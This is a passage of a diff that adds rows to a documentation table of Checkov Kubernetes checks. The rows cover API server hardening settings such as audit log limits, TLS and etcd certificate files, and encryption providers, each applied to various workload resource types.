+| 3357 | CKV_K8S_92               | resource                         | DeploymentConfig                                                                                 | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate                                                                                                                               | Kubernetes              | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py)                                                                                |
+| 3358 | CKV_K8S_92               | resource                         | Job                                                                                              | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate                                                                                                                               | Kubernetes              | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py)                                                                                |
+| 3359 | CKV_K8S_92               | resource                         | Pod                                                                                              | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate                                                                                                                               | Kubernetes              | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py)                                                                                |
+| 3360 | CKV_K8S_92               | resource                         | PodTemplate                                                                                      | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate                                                                                                                               | Kubernetes              | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py)                                                                                |
+| 3361 | CKV_K8S_92               | resource                         | ReplicaSet                                                                                       | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate                                                                                                                               | Kubernetes              | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py)                                                                                |
+| 3362 | CKV_K8S_92               | resource                         | ReplicationController                                                                            | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate                                                                                                                               | Kubernetes              | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py)                                                                                |
+| 3363 | CKV_K8S_92               | resource                         | StatefulSet                                                                                      | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate                                                                                                                               | Kubernetes              | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py)                                                                                |
+| 3364 | CKV_K8S_93               | resource                         | CronJob                                                                                          | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate                                                                                                                            | Kubernetes              | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py)                                                                          |
+| 3365 | CKV_K8S_93               | resource                         | DaemonSet                                                                                        | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate                                                                                                                            | Kubernetes              | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py)                                                                          |
+| 3366 | CKV_K8S_93               | resource                         | Deployment                                                                                       | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate                                                                                                                            | Kubernetes              | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py)                                                                          |
+| 3367 | CKV_K8S_93               | resource                         | DeploymentConfig                                                                                 | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate                                                                                                                            | Kubernetes              | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py)                                                                          |
+| 3368 | CKV_K8S_93               | resource                         | Job                                                                                              | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate                                                                                                                            | Kubernetes              | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py)                                                                          |
+| 3369 | CKV_K8S_93               | resource                         | Pod                                                                                              | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate                                                                                                                            | Kubernetes              | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py)                                                                          |
+| 3370 | CKV_K8S_93               | resource                         | PodTemplate                                                                                      | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate                                                                                                                            | Kubernetes              | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py)                                                                          |
+| 3371 | CKV_K8S_93               | resource                         | ReplicaSet                                                                                       | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate                                                                                                                            | Kubernetes              | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py)                                                                          |
+| 3372 | CKV_K8S_93               | resource                         | ReplicationController                                                                            | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate                                                                                                                            | Kubernetes              | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py)                                                                          |
+| 3373 | CKV_K8S_93               | resource                         | StatefulSet                                                                                      | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate                                                                                                                            | Kubernetes              | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py)                                                                          |
+| 3374 | CKV_K8S_94               | resource                         | CronJob                                                                                          | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate                                                                                                                             | Kubernetes              | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py)                                                                              |
+| 3375 | CKV_K8S_94               | resource                         | DaemonSet                                                                                        | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate                                                                                                                             | Kubernetes              | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py)                                                                              |
+| 3376 | CKV_K8S_94               | resource                         | Deployment                                                                                       | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate                                                                                                                             | Kubernetes              | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py)                                                                              |
+| 3377 | CKV_K8S_94               | resource                         | DeploymentConfig                                                                                 | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate                                                                                                                             | Kubernetes              | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py)                                                                              |
+| 3378 | CKV_K8S_94               | resource                         | Job                                                                                              | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate                                                                                                                             | Kubernetes              | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py)                                                                              |
+| 3379 | CKV_K8S_94               | resource                         | Pod                                                                                              | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate                                                                                                                             | Kubernetes              | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py)                                                                              |
+| 3380 | CKV_K8S_94               | resource                         | PodTemplate                                                                                      | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate                                                                                                                             | Kubernetes              | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py)                                                                              |
+| 3381 | CKV_K8S_94               | resource                         | ReplicaSet                                                                                       | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate                                                                                                                             | Kubernetes              | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py)                                                                              |
+| 3382 | CKV_K8S_94               | resource                         | ReplicationController                                                                            | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate                                                                                                                             | Kubernetes              | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py)                                                                              |
+| 3383 | CKV_K8S_94               | resource                         | StatefulSet                                                                                      | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate                                                                                                                             | Kubernetes              | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py)                                                                              |
+| 3384 | CKV_K8S_95               | resource                         | CronJob                                                                                          | Ensure that the --request-timeout argument is set as appropriate                                                                                                                                         | Kubernetes              | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py)                                                                                |
+| 3385 | CKV_K8S_95               | resource                         | DaemonSet                                                                                        | Ensure that the --request-timeout argument is set as appropriate                                                                                                                                         | Kubernetes              | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py)                                                                                |
+| 3386 | CKV_K8S_95               | resource                         | Deployment                                                                                       | Ensure that the --request-timeout argument is set as appropriate                                                                                                                                         | Kubernetes              | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py)                                                                                |
+| 3387 | CKV_K8S_95               | resource                         | DeploymentConfig                                                                                 | Ensure that the --request-timeout argument is set as appropriate                                                                                                                                         | Kubernetes              | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py)                                                                                |
+| 3388 | CKV_K8S_95               | resource                         | Job                                                                                              | Ensure that the --request-timeout argument is set as appropriate                                                                                                                                         | Kubernetes              | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py)                                                                                |
+| 3389 | CKV_K8S_95               | resource                         | Pod                                                                                              | Ensure that the --request-timeout argument is set as appropriate                                                                                                                                         | Kubernetes              | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py)                                                                                |
+| 3390 | CKV_K8S_95               | resource                         | PodTemplate                                                                                      | Ensure that the --request-timeout argument is set as appropriate                                                                                                                                         | Kubernetes              | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py)                                                                                |
+| 3391 | CKV_K8S_95               | resource                         | ReplicaSet                                                                                       | Ensure that the --request-timeout argument is set as appropriate                                                                                                                                         | Kubernetes              | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py)                                                                                |
+| 3392 | CKV_K8S_95               | resource                         | ReplicationController                                                                            | Ensure that the --request-timeout argument is set as appropriate                                                                                                                                         | Kubernetes              | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py)                                                                                |
+| 3393 | CKV_K8S_95               | resource                         | StatefulSet                                                                                      | Ensure that the --request-timeout argument is set as appropriate                                                                                                                                         | Kubernetes              | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py)                                                                                |
+| 3394 | CKV_K8S_96               | resource                         | CronJob                                                                                          | Ensure that the --service-account-lookup argument is set to true                                                                                                                                         | Kubernetes              | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py)                                                                    |
+| 3395 | CKV_K8S_96               | resource                         | DaemonSet                                                                                        | Ensure that the --service-account-lookup argument is set to true                                                                                                                                         | Kubernetes              | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py)                                                                    |
+| 3396 | CKV_K8S_96               | resource                         | Deployment                                                                                       | Ensure that the --service-account-lookup argument is set to true                                                                                                                                         | Kubernetes              | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py)                                                                    |
+| 3397 | CKV_K8S_96               | resource                         | DeploymentConfig                                                                                 | Ensure that the --service-account-lookup argument is set to true                                                                                                                                         | Kubernetes              | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py)                                                                    |
+| 3398 | CKV_K8S_96               | resource                         | Job                                                                                              | Ensure that the --service-account-lookup argument is set to true                                                                                                                                         | Kubernetes              | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py)                                                                    |
+| 3399 | CKV_K8S_96               | resource                         | Pod                                                                                              | Ensure that the --service-account-lookup argument is set to true                                                                                                                                         | Kubernetes              | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py)                                                                    |
+| 3400 | CKV_K8S_96               | resource                         | PodTemplate                                                                                      | Ensure that the --service-account-lookup argument is set to true                                                                                                                                         | Kubernetes              | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py)                                                                    |
+| 3401 | CKV_K8S_96               | resource                         | ReplicaSet                                                                                       | Ensure that the --service-account-lookup argument is set to true                                                                                                                                         | Kubernetes              | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py)                                                                    |
+| 3402 | CKV_K8S_96               | resource                         | ReplicationController                                                                            | Ensure that the --service-account-lookup argument is set to true                                                                                                                                         | Kubernetes              | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py)                                                                    |
+| 3403 | CKV_K8S_96               | resource                         | StatefulSet                                                                                      | Ensure that the --service-account-lookup argument is set to true                                                                                                                                         | Kubernetes              | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py)                                                                    |
+| 3404 | CKV_K8S_97               | resource                         | CronJob                                                                                          | Ensure that the --service-account-key-file argument is set as appropriate                                                                                                                                | Kubernetes              | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py)                                                                  |
+| 3405 | CKV_K8S_97               | resource                         | DaemonSet                                                                                        | Ensure that the --service-account-key-file argument is set as appropriate                                                                                                                                | Kubernetes              | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py)                                                                  |
+| 3406 | CKV_K8S_97               | resource                         | Deployment                                                                                       | Ensure that the --service-account-key-file argument is set as appropriate                                                                                                                                | Kubernetes              | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py)                                                                  |
+| 3407 | CKV_K8S_97               | resource                         | DeploymentConfig                                                                                 | Ensure that the --service-account-key-file argument is set as appropriate                                                                                                                                | Kubernetes              | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py)                                                                  |
+| 3408 | CKV_K8S_97               | resource                         | Job                                                                                              | Ensure that the --service-account-key-file argument is set as appropriate                                                                                                                                | Kubernetes              | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py)                                                                  |
+| 3409 | CKV_K8S_97               | resource                         | Pod                                                                                              | Ensure that the --service-account-key-file argument is set as appropriate                                                                                                                                | Kubernetes              | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py)                                                                  |
+| 3410 | CKV_K8S_97               | resource                         | PodTemplate                                                                                      | Ensure that the --service-account-key-file argument is set as appropriate                                                                                                                                | Kubernetes              | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py)                                                                  |
+| 3411 | CKV_K8S_97               | resource                         | ReplicaSet                                                                                       | Ensure that the --service-account-key-file argument is set as appropriate                                                                                                                                | Kubernetes              | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py)                                                                  |
+| 3412 | CKV_K8S_97               | resource                         | ReplicationController                                                                            | Ensure that the --service-account-key-file argument is set as appropriate                                                                                                                                | Kubernetes              | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py)                                                                  |
+| 3413 | CKV_K8S_97               | resource                         | StatefulSet                                                                                      | Ensure that the --service-account-key-file argument is set as appropriate                                                                                                                                | Kubernetes              | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py)                                                                  |
+| 3414 | CKV_K8S_99               | resource                         | CronJob                                                                                          | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate                                                                                                                      | Kubernetes              | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py)                                                                                |
+| 3415 | CKV_K8S_99               | resource                         | DaemonSet                                                                                        | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate                                                                                                                      | Kubernetes              | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py)                                                                                |
+| 3416 | CKV_K8S_99               | resource                         | Deployment                                                                                       | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate                                                                                                                      | Kubernetes              | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py)                                                                                |
+| 3417 | CKV_K8S_99               | resource                         | DeploymentConfig                                                                                 | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate                                                                                                                      | Kubernetes              | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py)                                                                                |
+| 3418 | CKV_K8S_99               | resource                         | Job                                                                                              | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate                                                                                                                      | Kubernetes              | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py)                                                                                |
+| 3419 | CKV_K8S_99               | resource                         | Pod                                                                                              | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate                                                                                                                      | Kubernetes              | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py)                                                                                |
+| 3420 | CKV_K8S_99               | resource                         | PodTemplate                                                                                      | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate                                                                                                                      | Kubernetes              | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py)                                                                                |
+| 3421 | CKV_K8S_99               | resource                         | ReplicaSet                                                                                       | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate                                                                                                                      | Kubernetes              | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py)                                                                                |
+| 3422 | CKV_K8S_99               | resource                         | ReplicationController                                                                            | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate                                                                                                                      | Kubernetes              | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py)                                                                                |
+| 3423 | CKV_K8S_99               | resource                         | StatefulSet                                                                                      | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate                                                                                                                      | Kubernetes              | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py)                                                                                |
+| 3424 | CKV_K8S_100              | resource                         | CronJob                                                                                          | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate                                                                                                              | Kubernetes              | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py)                                                                                  |
+| 3425 | CKV_K8S_100              | resource                         | DaemonSet                                                                                        | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate                                                                                                              | Kubernetes              | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py)                                                                                  |
+| 3426 | CKV_K8S_100              | resource                         | Deployment                                                                                       | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate                                                                                                              | Kubernetes              | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py)                                                                                  |
+| 3427 | CKV_K8S_100              | resource                         | DeploymentConfig                                                                                 | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate                                                                                                              | Kubernetes              | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py)                                                                                  |
+| 3428 | CKV_K8S_100              | resource                         | Job                                                                                              | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate                                                                                                              | Kubernetes              | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py)                                                                                  |
+| 3429 | CKV_K8S_100              | resource                         | Pod                                                                                              | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate                                                                                                              | Kubernetes              | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py)                                                                                  |
+| 3430 | CKV_K8S_100              | resource                         | PodTemplate                                                                                      | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate                                                                                                              | Kubernetes              | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py)                                                                                  |
+| 3431 | CKV_K8S_100              | resource                         | ReplicaSet                                                                                       | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate                                                                                                              | Kubernetes              | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py)                                                                                  |
+| 3432 | CKV_K8S_100              | resource                         | ReplicationController                                                                            | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate                                                                                                              | Kubernetes              | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py)                                                                                  |
+| 3433 | CKV_K8S_100              | resource                         | StatefulSet                                                                                      | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate                                                                                                              | Kubernetes              | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py)                                                                                  |
+| 3434 | CKV_K8S_102              | resource                         | CronJob                                                                                          | Ensure that the --etcd-cafile argument is set as appropriate                                                                                                                                             | Kubernetes              | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py)                                                                                        |
+| 3435 | CKV_K8S_102              | resource                         | DaemonSet                                                                                        | Ensure that the --etcd-cafile argument is set as appropriate                                                                                                                                             | Kubernetes              | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py)                                                                                        |
+| 3436 | CKV_K8S_102              | resource                         | Deployment                                                                                       | Ensure that the --etcd-cafile argument is set as appropriate                                                                                                                                             | Kubernetes              | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py)                                                                                        |
+| 3437 | CKV_K8S_102              | resource                         | DeploymentConfig                                                                                 | Ensure that the --etcd-cafile argument is set as appropriate                                                                                                                                             | Kubernetes              | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py)                                                                                        |
+| 3438 | CKV_K8S_102              | resource                         | Job                                                                                              | Ensure that the --etcd-cafile argument is set as appropriate                                                                                                                                             | Kubernetes              | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py)                                                                                        |
+| 3439 | CKV_K8S_102              | resource                         | Pod                                                                                              | Ensure that the --etcd-cafile argument is set as appropriate                                                                                                                                             | Kubernetes              | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py)                                                                                        |
+| 3440 | CKV_K8S_102              | resource                         | PodTemplate                                                                                      | Ensure that the --etcd-cafile argument is set as appropriate                                                                                                                                             | Kubernetes              | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py)                                                                                        |
+| 3441 | CKV_K8S_102              | resource                         | ReplicaSet                                                                                       | Ensure that the --etcd-cafile argument is set as appropriate                                                                                                                                             | Kubernetes              | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py)                                                                                        |
+| 3442 | CKV_K8S_102              | resource                         | ReplicationController                                                                            | Ensure that the --etcd-cafile argument is set as appropriate                                                                                                                                             | Kubernetes              | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py)                                                                                        |
+| 3443 | CKV_K8S_102              | resource                         | StatefulSet                                                                                      | Ensure that the --etcd-cafile argument is set as appropriate                                                                                                                                             | Kubernetes              | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py)                                                                                        |
+| 3444 | CKV_K8S_104              | resource                         | CronJob                                                                                          | Ensure that encryption providers are appropriately configured                                                                                                                                            | Kubernetes              | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py)                                                                      |
+| 3445 | CKV_K8S_104              | resource                         | DaemonSet                                                                                        | Ensure that encryption providers are appropriately configured                                                                                                                                            | Kubernetes              | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py)                                                                      |
+| 3446 | CKV_K8S_104              | resource                         | Deployment                                                                                       | Ensure that encryption providers are appropriately configured                                                                                                                                            | Kubernetes              | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py)                                                                      |
